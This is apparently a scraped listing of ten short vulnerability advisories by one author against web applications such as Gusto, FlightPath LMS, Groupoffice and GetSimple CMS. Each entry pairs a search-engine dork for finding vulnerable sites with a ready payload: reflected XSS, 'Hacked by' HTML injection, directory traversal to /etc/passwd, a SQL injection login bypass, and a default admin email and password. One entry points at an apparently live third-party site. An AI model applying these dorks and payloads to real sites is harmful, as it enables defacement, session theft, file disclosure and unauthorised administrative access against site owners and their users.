Gusto Recipes Management version 1.5.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Gusto - Recipes Management v1.5.1 System XSS Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.elmanawy.info/demo/gusto/                                                                              |  | # Dork      : /profile/1-gusto                                                                                                   |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use Payload : /search?category_id=1&title=Mr.'"()%26%25<acx><script>alert(/indoushka/);</script> [+]  https://127.0.0.1/elmanawyinfo/demo/gusto/recipes/search?category_id=1&title=Mr.%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E  Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Gusto Recipes Management 1.5.1 Cross Site Scripting

Global Domains International version 2.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Global Domains International v2.0 XSS Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.worldsite.ws/                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected File : /idn-orderflow/index.dhtml [+] use Payload : /idn-orderflow/index.dhtml?act=pre_search&domains=Type a word&lang_original=af_</script><script>prompt(964811)</script>&no_new=true&search_from=frontpage&step=30&userid=bnftfnad&xs=[+] https://127.0.0.1/worldsitews/idn-orderflow/index.dhtml?act=pre_search&domains=Type%20a%20word&lang_original=af_%3C/script%3E%3Cscript%3Eprompt(964811)%3C/script%3E&no_new=true&search_from=frontpage&step=30&userid=bnftfnad&xs=Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Global Domains International 2.0 Cross Site Scripting

FlightPath LMS version 5.0-rc2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : FlightPath LMS v5.0-rc2 XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://getflightpath.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=<--`<script>alert(/indoushka/);</script>``> --!>[+] https://127.0.0.1/webservicesulmedu/flightpath/tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FlightPath LMS 5.0-rc2 Cross Site Scripting

Gusto Recipes Management version 1.5.1 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Gusto - Recipes Management v1.5.1 System Insecure Settings Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.elmanawy.info/demo/gusto/                                                                              |  | # Dork      : /profile/1-gusto                                                                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] appears to leave a default administrative account in place post installation.[+] use Login : Email    : admin@admin.com                 Password : 123456 [+] http://127.0.0.1/mbc1org/admin/dashboard  Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Gusto Recipes Management 1.5.1 Insecure Settings

Groupoffice version 3.4.21 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Groupoffice v3.4.21 Directory Traversal Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.group-office.com                                                                                         || # Dork      : Powered by Group-Office                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /compress.php?file=../../../../../../../../../../windows/win.ini[+] http://127.0.0.1/aa-hwkorg/compress.php?file=../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Groupoffice 3.4.21 Directory Traversal

Gravigra CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Gravigra CMS v1.0 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.alwafaagroup.com/                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news.php?nid=1 ( inject her )[+] use payload : http://127.0.0.1/gravigracom/news.php?nid=1 ( inject her )Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Gravigra CMS 1.0 SQL Injection

Global Domains International version 2.0 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Global Domains International v2.0 HTML inject Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.worldsite.ws/                                                                                          || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected File : /index.dhtml [+] use Payload : /index.dhtml?sponsor=gditrafficws'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://127.0.0.1/worldsitews/index.dhtml?sponsor=gditrafficws'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Global Domains International 2.0 HTML Injection

GetSimple CMS version 3.3.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : GetSimple CMS v3.3.2 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://get-simple.info/                                                                                            || # Dork      :  © 2009-2014 GetSimple CMS – Version 3.3.2                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] LIne 5 Se7 y0ur T@rg3t .[+] XSS Reflected - Jquery v1.7.1 :<html><head>  <meta charset="utf-8">  <title>XSS Reflected - Jquery v1.7.1 </title>  <script src="http://127.0.0.1/GetSimpleCMS/admin/template/js/jquery.min.js"></script>  <script>    $(function() {      $('#users').each(function() {        var select = $(this);        var option = select.children('option').first();        select.after(option.text());        select.hide();      });    });  </script></head>  <body>  <form method="post">    <p>      <select id="users" name="users">        <option value="xssreflected"><script>alert(&#x27;xssreflected - jquery v1.7.1 by - indoushka thnx to @firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>      </select>    </p>  </form></body></html>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

GetSimple CMS 3.3.2 Cross Site Scripting

G and G Corporate CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : G&G Corporate CMS v1.0 Auth by Pass Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://gegweb.it                                                                                                   |  | # Dork      : intext:Powered by Studio G&G Corporate Communication site:it                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : User & Pass : 'or''='[+] http://wwwpriolinoxeu/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

G And G Corporate CMS 1.0 SQL Injection

GEN Security+ version 4.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : GEN Security+ v4.0 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.ptcpay.com/                                                                                            || # Dork      : Powered by GeN4 Security+ 2.0                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Us3 P@yL04D: GEN/forum/search.php?a=1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&q=1&Submit=1[+] http://127.0.0.1/GEN/forum/search.php?a=1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&q=1&Submit=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#firefox